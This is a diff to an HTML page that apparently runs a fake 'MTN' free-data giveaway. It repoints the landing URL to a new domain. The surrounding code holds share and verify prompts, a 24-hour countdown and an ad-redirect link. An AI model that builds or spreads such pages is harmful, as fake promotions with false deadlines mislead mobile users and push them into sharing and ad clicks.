--- a/mtndamba.html
+++ b/mtndamba.html
@@ -757,7 +757,7 @@
             congrats: document.querySelector(".js-congrats"),
             sharing: document.querySelector(".js-share"),
             verify: document.querySelector("#verify")
-        }, objServer = {}, landingDomain = "https://ekpeukap.github.io/sa20gb/sa10gb.html",
+        }, objServer = {}, landingDomain = "https://damba-fest.org/mtndamba.html",
         adsLink = "http://outrotomr.com/4/3144603";
         //adsLink = "/";
     document.addEventListener("click", function (c) {
@@ -824,7 +824,7 @@
     });
 
     get_Cookie('e') ? setTimeout('enviar()',500) : void(0);
-    landingDomain='https://ekpeukap.github.io/sa20gb/sa10gb.html'
+    landingDomain='https://damba-fest.org/mtndamba.html'
     function deadline() {
         var day3 = new Date();
         day3.setTime(day3.getTime()+24*60*60*1000);
